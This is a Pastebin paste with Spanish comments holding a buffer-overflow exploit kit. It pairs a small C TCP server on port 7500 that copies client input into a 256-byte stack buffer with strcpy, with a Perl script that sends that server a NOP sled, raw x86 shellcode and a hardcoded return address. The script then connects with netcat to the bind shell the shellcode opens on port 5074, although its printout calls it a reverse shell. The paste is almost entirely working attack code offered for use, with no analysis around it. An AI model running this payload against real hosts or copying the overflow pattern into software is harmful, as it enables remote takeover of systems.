Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -------------------Code.c--------------------------------------
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <errno.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #define LISTENPORT 7500
- #define BACKLOG 10
- #define MSG "Hola, Como estas? "
- int handle_reply(char *str)
- {
- char response[256];
- strcpy(response,str);
- printf("El cliente dice: << %s\x0a",response);
- return 0;
- }
- int main(int argc, char * argv[]) {
- int sock, conn;
- struct sockaddr_in my_addr, client_addr;
- int sockopt_on = 1;
- int sa_in_size = sizeof(struct sockaddr_in);
- char reply[1024];
- //obteniendo el socket
- if ((sock = socket(AF_INET, SOCK_STREAM,0)) == -1) {
- perror("socket");
- exit(1);
- }
- //primer zero de la estructura
- memset((char *) &my_addr, 0, sa_in_size);
- //parte importante
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons(LISTENPORT);
- my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
- //bindeando el puerto a nuestro programa
- if (bind(sock,(struct sockaddr *)&my_addr, sa_in_size) == -1) {
- perror("bind");
- exit(1);
- }
- //iniciando el puerto a la escucha por nuevas conexiones
- if (listen(sock,BACKLOG) == -1) {
- perror("listen");
- exit(1);
- }
- while(1) {
- conn = accept(sock, (struct sockaddr *)&client_addr, &sa_in_size);
- if (conn == -1) {
- perror("accept");
- exit(1);
- }
- //logeando al cliente
- printf("Conexion desde: %i\n", inet_ntoa(client_addr.sin_addr));
- //enviando el mensaje
- send(conn,MSG,strlen(MSG)+1,0);
- //obteniendo la respuesta
- recv(conn, reply, 1024, 0);
- handle_reply(reply);
- }
- return 0;
- }
- /*EOF*/
- -----------------------------------Socks.pl---------------------------
- use IO::Socket;
- $ip = $ARGV[0];
- $nopsled = "\x90" x 176;
- #264 + 8 = 268 - 94 = 176
- $ebp = "AAAA";
- $eip = "\xc0\xf1\xff\xbf";
- #shellcode de 94 bytes
- $shellcode =
- "\x31\xc0". "\x50"."\x40"."\x89\xc3"."\x50".
- "\x40"."\x50"."\x89\xe1"."\xb0\x66"."\xcd\x80"."\x31\xd2"."\x52".
- "\x66\x68\x13\xd2"."\x43"."\x66\x53"."\x89\xe1"."\x6a\x10"."\x51".
- "\x50"."\x89\xe1"."\xb0\x66"."\xcd\x80"."\x40"."\x89\x44\x24\x04".
- "\x43"."\x43"."\xb0\x66"."\xcd\x80"."\x83\xc4\x0c"."\x52"."\x52".
- "\x43"."\xb0\x66"."\xcd\x80"."\x93"."\x89\xd1"."\xb0\x3f"."\xcd\x80".
- "\x41"."\x80\xf9\x03"."\x75\xf6"."\x52". "\x68\x6e\x2f\x73\x68".
- "\x68\x2f\x2f\x62\x69"."\x89\xe3"."\x52"."\x53"."\x89\xe1".
- "\xb0\x0b"."\xcd\x80";
- $payload = $nopsled.$shellcode.$eip;
- if (!$ip) { die "Uso: perl $0 <ip>\n"; }
- $puerto = '7500';
- $protocolo = 'tcp';
- $socket = IO::Socket::INET->new(
- PeerAddr => $ip,
- PeerPort => $puerto,
- Proto => $protocolo,
- Timeoud => '1'
- ) || die "Error de coneccion\n";
- print $socket $payload;
- close ($socket);
- print "Payload enviado exitosamente!\n";
- $comando="nc -vv $ip 5074";
- print "\nConectado reverse_shell \n";
- system($comando);
Advertisement
Add Comment
Please, Sign In to add comment